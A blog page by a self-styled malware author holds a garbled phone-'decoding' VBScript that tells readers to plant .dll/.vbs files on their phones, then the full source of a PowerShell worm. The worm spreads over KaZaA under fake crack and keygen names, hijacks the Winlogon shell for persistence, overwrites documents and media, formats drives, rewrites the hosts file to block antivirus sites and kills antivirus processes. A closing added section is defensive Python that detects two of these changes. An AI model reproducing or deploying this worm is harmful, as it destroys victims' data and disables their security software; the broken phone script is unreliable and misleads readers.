Branko.D.Tomic Luxilius branko.82@hotmail.com
    Tuesday, August 7, 2007
    " We can perform the decoding by way of scripting,
    into which we will insert the following:

    " But it is important to know that where I wrote
    SerijskiBrojtelefona you need to insert
    your PHONE SERIAL NUMBER.

    " Connect your coded phone to the computer
    over USB and let's begin...

    " Copy these commands into Notepad,
    then insert your phone serial number.

    " Then, once you have entered everything, save the file
    (Save in) directly to your phone's drive
    and name it decode.vbs, then wait a little,
    that is, switch your phone off for a moment and
    turn it back on. If that option with the file decode.vbs
    does not work, name the file differently: decode.db
    or decode.css or keyfiledl.dll or decode.dll
    " Copy only the text below the asterisks...
    *****************************************************

    Function Decode(SerijskiBrojtelefona As String)
    Const D = "1234567890A78BCSDEFGHCS344HJKLM5657NBVLC90112TGMLKBHJFZGH3234"
    Dim I As Integer
    Dim DecodS As Integer
    Dim A_Long As Integer
    Dim Str As String
    A_Long = Len(SerijskiBrojtelefona)
    For I = 1 To A_Long
    String = Mid(SerijskiBrojtelefona, I, 1)
    CodS = Asc(String) + I
    If CodS > Len(D) Then CodS = Decode - Len(D)
    Decode = Decode & Mid(D, CodS, 1)
    Next I
    End Function

    ********************************************************

    " I forgot to give you one more great instruction
    for your problem: what if you have forgotten
    what the phone's serial number is?! Then you will
    have to insert the Chapo-Worm, which is
    in my tag list. Go to the Chapo-worm entry in the list,
    copy the commands into Notepad, and then do not
    save it in the format strejtsity.jpg; instead
    save it as keydecoder.dll, but with the same procedure
    that I entered here as an example ...

    " So, copy the chapo-worm commands
    and save it to the phone's drive, which is
    shown while it is connected with the USB cable...

    " I hope I EXPLAINED it to you well...?
    undermine @ 11:14 | Comments: 1
    Worm.html
    # UnderminE alias Luxilius's Powershell Skript Worm
    #
    # This worm is for the PowerShell Script Interpreter
    # which is included with Microsoft Windows Vista
    #
    # This worm is ¸2008 by underminE alias Luxilius
    #
    # Visit my homepages: www.underminE.bloger.hr & www.underminE.bloger.hr & www.underminE.bloger.hr
    #
    # This worm has following features:
    #
    # - Spreads with P2P (KaZaA Lite) per JScript
    # - Writes a registry string to run every time windows starts
    # - Changes RegisteredOwner, RegisteredOrga, Ie Title, Hidden Files, FileExt and Ie Page
    # - overwrites specific files in Eigene Dateien Folder and Subfolders
    # - formating all insertet drives and discettes
    # - deletes files in %system32%\drivers\etc
    # - overwrites the host file in %system32%\drivers\etc
    # - kills some well-known Anti-Virus processes
    # - deletes Reg-Values from well-known Antiviruses
    # - tells a message to user, with informations about the worm
    #
    #
    # Informations:
    #
    # This worm is a proof of concept worm. Because of it is able
    # to run Powershell on Windows XP, too (Need .Net Framework 2.0)
    # this worm is dedicated to Windows XP. Well, yes, it runs on
    # Windows Vista, too. But I don't know if the structures are the
    # same as in windows Xp. Note that this worm uses ActiveX Objects.
    # In this worm I use Scripting.FileSystemObject and WScript.Shell
    # Object. I hope Vista will include those ActiveX Objects, too.
    # I am happy to be the coder of this worm. I like this language.
    # And I am looking forward to new Malware in PowerShell.
    # Now I will release more and more worms in this language.
    #
    # This worm is ¸2008 by underminE alias Luxilius. To tell me anything
    # write me an email @ hard.rock.blogger@gmail.com or a pm at www.underminE.bloger.hr
    #
    # ======================================================================

    $fso = New-Object -Com Scripting.FileSystemObject ;
    $wshs = New-Object -Com WScript.Shell ;
    $windir = $fso.GetSpecialFolder(0)
    $sysdir = $fso.GetSpecialFolder(1)

    $strInfoString_one = "This is a PowerShell Script worm. ";
    $strInfoString_two = "This worm is proof-of-concept ";
    $strInfoString_three = "the worm is ¸2008 by underminE alias Luxilius ";
    $strInfoString_four = "for informations write an email @ hard.rock.blogger@gmail.com ";


    $KazaaDir = $wshs.RegRead('HKEY_CURRENT_USER\Software\Kazaa\LocalContent\DownloadDir');
    $AllMshDateinCurDir = get-childitem *.msh
    foreach ($PowerShellScript in $AllMshDateinCurDir)
    {
      if ($PowerShellScript.Length=13035)
      {
        $MySelfWorm = $PowerShellScript.Name;
      }
    }
    $gtFilesMsh = $fso.getfile($MySelfWorm);
    if (!$fso.fileexists($Sysdir.Path\WinLuxUndermine.msh)
    {
        $gtFilesMsh.Copy($Sysdir.Path\WinLuxUndermine.msh);
    }
    $gtFilesMsh.copy("$KazaaDir\Microsoft Windows Vista Cd-Key.txt.msh");
    $gtFilesMsh.copy("$KazaaDir\Windows Vista Update.msh");
    $gtFilesMsh.copy("$KazaaDir\Ad-aware SE Personal Edition 1.06r1.msh");
    $gtFilesMsh.copy("$KazaaDir\Ashampoo Media Player 2.03 install.msh");
    $gtFilesMsh.copy("$KazaaDir\Allround WinZIP Key Generator.msh");
    $gtFilesMsh.copy("$KazaaDir\Talisman Desktop 2.99 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Nero Burning Rom 6.6.0.13 Crack.msh");
    $gtFilesMsh.copy("$KazaaDir\Kaspersky KeyGen working.msh");
    $gtFilesMsh.copy("$KazaaDir\Daemon Tools Install + Crack.rar.msh");
    $gtFilesMsh.copy("$KazaaDir\AVP - AntiVirus Key Generator.msh");


    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1, "REG_DWORD");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOrganization", "United People of infected Ps","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner", "underminELuxilius","REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "Infected with Ps Worm by underminE alias Luxilius","REG_SZ");
    $wshs.regwrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell", "explorer.exe  $sysdir.Path\WinLuxUndermine.msh" ,"REG_SZ");
    $wshs.regwrite("HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.underminE.bloger.hr")


    $PersonalDirectory = $wshs.regread("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal");
    UeberschreibeDateien($PersonalDirectory)

    function UeberschreibeDateien($strOrdner)
    {
        $StringToOverwrite = "This file was overwritten with a Ps Worm. ";
        $StringToOverwrite += "This Worm is ¸2008 by underminE alias Luxilius! ";
       
        $OverWrtOwnFiles = $fso.getfolder($strOrdner)
        $OverFiles = $OverWrtOwnFiles.Files
        $TheSubFldr = $OverWrtOwnFiles.subfolders
       
        foreach ($SubFiles in $TheSubFldr.Files)
        {
            $strGetExt = $fso.GetExtensionName($AlleDateien.Path);
            if ($strGetExt="JPG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="BMP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="GIF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PNG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="JPEG")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="AVI")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="MP3")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMV")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="WMA")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="DOC")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="XLS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RTF")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPS")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="PPT")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="ZIP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="RAR")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
           
            if ($strGetExt="CPP")
            {
                del $AlleDateien.Path ;
                echo "$StringToOverwrite" >> $AlleDateien.Path
            }
        }
       
        foreach ($NochMehrUnterOrdner in $TheSubFldr)
        {
            UeberschreibeDateien($NochMehrUnterOrdner)
        }

    }

    $TheDrives = $fso.Drives
    foreach ($AllDrives in $TheDrives)
        {
        if ($AllDrives.DriveType=1)
        {
            format $AllDrives.Path /y
        }
        if ($AllDrives.DriveType=2)
        {
            format $AllDrives.Path /y
        }
    }


    cd "$sysdir.path\Drivers\etc";
    del "networks";
    del "protocol";
    del "services";
    del "hosts";
    del "hosts.bak";
    echo "# Host File overwritten by Ps Worm " >> hosts
    echo "# This file disallows you to visit av and dl sites :> " >> hosts
    echo " " >> hosts
    echo "127.0.0.1 www.antivir.de " >> hosts
    echo "127.0.0.1 www.bitdefender.de " >> hosts
    echo "127.0.0.1 www.znet.de " >> hosts
    echo "127.0.0.1 www.chip.de " >> hosts
    echo "127.0.0.1 www.virustotal.com " >> hosts
    echo "127.0.0.1 virusscan.jotti.org " >> hosts
    echo "127.0.0.1 www.kaspersky.com " >> hosts
    echo "127.0.0.1 www.sophos.de " >> hosts
    echo "127.0.0.1 www.trojaner-info.de " >> hosts
    echo "127.0.0.1 www.trojaner-help.de " >> hosts
    echo "127.0.0.1 www.arcabit.com " >> hosts
    echo "127.0.0.1 www.avast.com " >> hosts
    echo "127.0.0.1 www.grisoft.com " >> hosts
    echo "127.0.0.1 www.bitdefender.com " >> hosts
    echo "127.0.0.1 www.clamav.net " >> hosts
    echo "127.0.0.1 www.drweb.com " >> hosts
    echo "127.0.0.1 www.f-prot.com " >> hosts)
    echo "127.0.0.1 www.google.de " >> hosts
    echo "127.0.0.1 www.google.com " >> hosts
    echo "127.0.0.1 www.google.co.yu " >> hosts
    echo "127.0.0.1 www.fortinet.com " >> hosts
    echo "127.0.0.1 www.eset.com " >> hosts
    echo "127.0.0.1 www.nod32.com " >> hosts
    echo "127.0.0.1 www.norman.com " >> hosts
    echo "127.0.0.1 www.microsoft.com " >> hosts
    echo "127.0.0.1 www.anti-virus.by/en " >> hosts
    echo "127.0.0.1 www.symantec.com " >> hosts
    echo "127.0.0.1 www.windowsupdate.com " >> hosts
    echo "127.0.0.1 www.trendmicro.com " >> hosts
    echo "127.0.0.1 www.mcafee.com " >> hosts
    echo "127.0.0.1 www.viruslist.com " >> hosts
    echo "127.0.0.1 www.avp.com " >> hosts
    echo "127.0.0.1 www.zonelabs.com " >> hosts
    echo "127.0.0.1 www.heise.de " >> hosts
    echo "127.0.0.1 www.antivirus-online.de " >> hosts
    echo "127.0.0.1 www.free-av.com " >> hosts
    echo "127.0.0.1 www.panda-software.com " >> hosts
    echo "127.0.0.1 www.pc-welt.de " >> hosts
    echo "127.0.0.1 www.pc-special.net " >> hosts
    echo "127.0.0.1 download.freenet.de " >> hosts
    echo "127.0.0.1 www.vollversion.de " >> hosts
    echo "127.0.0.1 www.das-download-archiv.de " >> hosts
    echo "127.0.0.1 www.freeware.de " >> hosts
    echo "127.0.0.1 www.antiviruslab.com " >> hosts
    echo "127.0.0.1 www.search.yahoo.com " >> hosts
    echo "127.0.0.1 www.web.de " >> hosts
    echo "127.0.0.1 www.hotmail.com " >> hosts
    echo "127.0.0.1 www.hotmail.de " >> hosts
    echo "127.0.0.1 www.gmx.net " >> hosts
    echo "127.0.0.1 www.spiegel.de " >> hosts
    echo "127.0.0.1 www.icq.com " >> hosts
    echo "127.0.0.1 www.icq.de " >> hosts
    echo "127.0.0.1 www.ffh.de " >> hosts
    echo "127.0.0.1 www.lavasoft.de " >> hosts
    echo "127.0.0.1 www.de.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wikipedia.org " >> hosts
    echo "127.0.0.1 www.en.wikipedia.org " >> hosts
    echo "127.0.0.1 www.wissen.de " >> hosts
    echo "127.0.0.1 www.virus-aktuell.de " >> hosts
    echo "127.0.0.1 www.arcor.de " >> hosts
    echo "127.0.0.1 www.t-online.de " >> hosts
    echo "127.0.0.1 www.t-com.de " >> hosts
    echo "127.0.0.1 www.alice-dsl.de " >> hosts
    echo "127.0.0.1 www.freenet.de " >> hosts
    echo "127.0.0.1 www.1und1.de " >> hosts
    echo "127.0.0.1 www.fbi.gov " >> hosts
    echo "127.0.0.1 www.polizei.de " >> hosts
    echo "127.0.0.1 www.mup.sr.gov.yu " >> hosts


    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\avgnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KAVPersonal50'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVG7_CC');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDMCon'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDNewsAgent');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BDOESRV');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\pccguide.exe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\DrWebScheduler');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerMail'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SpIDerNT'); 
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCAgentExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\MCUpdateExe');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OASClnt');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VirusScan Online');
    $wshs.regdelete('HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VSOCheckTask');
       
       
    tskill avcenter /a
    tskill avconfig /a
    tskill avscan /a
    tskill avguard /a
    tskill avgnt /a
    tskill update /a
    tskill preupd /a
    tskill avcmd /a
    tskill avesvc /a
    tskill kav /a
    tskill kavsvc /a
    tskill kavsend /a
    tskill keymanager /a
    tskill agentsvr /a
    tskill avgcc /a
    tskill avgupsvc /a
    tskill avgamsvr /a
    tskill vsserv /a
    tskill bdss /a
    tskill xcommsvr /a
    tskill bdnagent /a
    tskill bdoesrv /a
    tskill bdmcon /a
    tskill bdswitch /a
    tskill rtvr /a
    tskill bdsubmit /a
    tskill bdlite /a
    tskill agentsvr /a
    tskill tmproxy /a
    tskill PcCtlCom /a
    tskill pccguide /a
    tskill qttask /a
    tskill patch /a
    tskill Tmntsrv /a
    tskill PccPrm /a
    tskill DrWebUpW /a
    tskill spidernt /a
    tskill DrWebScd /a
    tskill DrWeb32w /a
    tskill drwadins /a
    tskill mcupdui /a
    tskill McTskshd /a
    tskill McAppIns /a
    tskill mghtml /a
    tskill McShield /a
    tskill Mcdetect /a
    tskill McVSEscn /a
    tskill oasclnt /a
    tskill mcvsshld /a


    echo "$strInfoString_one ";
    echo "$strInfoString_two ";
    echo "$strInfoString_three ";
    echo "$strInfoString_four ";

    $wshs.popup("www.underminE.bloger.hr - www.underminE.bloger.hr -
    www.underminE.bloger.hr | Worm ¸2008 by underminE alias Luxilius",2,"PowerShell Worm by underminE alias Luxilius");

    exit ;
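
For analysts triaging a host, the following added example (not part of the original page or the author's code) checks two artifacts the listing's header describes: hosts-file entries that point real sites at loopback, and a Winlogon `Shell` value that launches a script. The sample inputs are constructed, and the function names, the `C:\WINDOWS\system32` path and the extension list are assumptions of this example.

```python
import ipaddress

# Constructed sample artifacts modelled on the listing (not taken from a real host).
SAMPLE_HOSTS = """\
# Host File overwritten by Ps Worm
127.0.0.1 localhost
127.0.0.1 www.kaspersky.com
127.0.0.1 www.windowsupdate.com
192.0.2.10 intranet.example
"""
# Assumed expansion of the system directory; the value itself is constructed.
SAMPLE_SHELL = r"explorer.exe  C:\WINDOWS\system32\WinLuxUndermine.msh"

# Assumption: script extensions worth flagging when they appear in the shell value.
SCRIPT_EXTENSIONS = (".msh", ".ps1", ".vbs", ".js", ".bat", ".cmd")


def loopback_redirects(hosts_text):
    """Return dotted hostnames that a hosts file maps to loopback or 0.0.0.0."""
    flagged = []
    for raw in hosts_text.splitlines():
        fields = raw.split("#", 1)[0].split()   # strip comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            addr = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                            # first field is not an IP address
        if not (addr.is_loopback or addr.is_unspecified):
            continue
        for name in fields[1:]:
            name = name.lower().rstrip(".")
            if "." in name:                     # skips single-label names such as localhost
                flagged.append(name)
    return flagged


def winlogon_shell_findings(shell_value):
    """Return reasons a Winlogon Shell value differs from the default 'explorer.exe'."""
    value = shell_value.strip()
    findings = []
    if value.lower() != "explorer.exe":
        findings.append("non-default shell value")
    for token in value.replace(",", " ").split():
        if token.lower().endswith(SCRIPT_EXTENSIONS):
            findings.append("script passed to shell: " + token)
    return findings


def triage(hosts_text, shell_value):
    """Combine both checks into one report for an analyst."""
    return {
        "hosts_loopback_redirects": loopback_redirects(hosts_text),
        "winlogon_shell": winlogon_shell_findings(shell_value),
    }


if __name__ == "__main__":
    for check, items in triage(SAMPLE_HOSTS, SAMPLE_SHELL).items():
        print(check, items)
```

Hosts files maintained for ad blocking also map names to loopback, so the redirect list is a starting point for review: security-vendor and update domains in it are the signal that matches this listing.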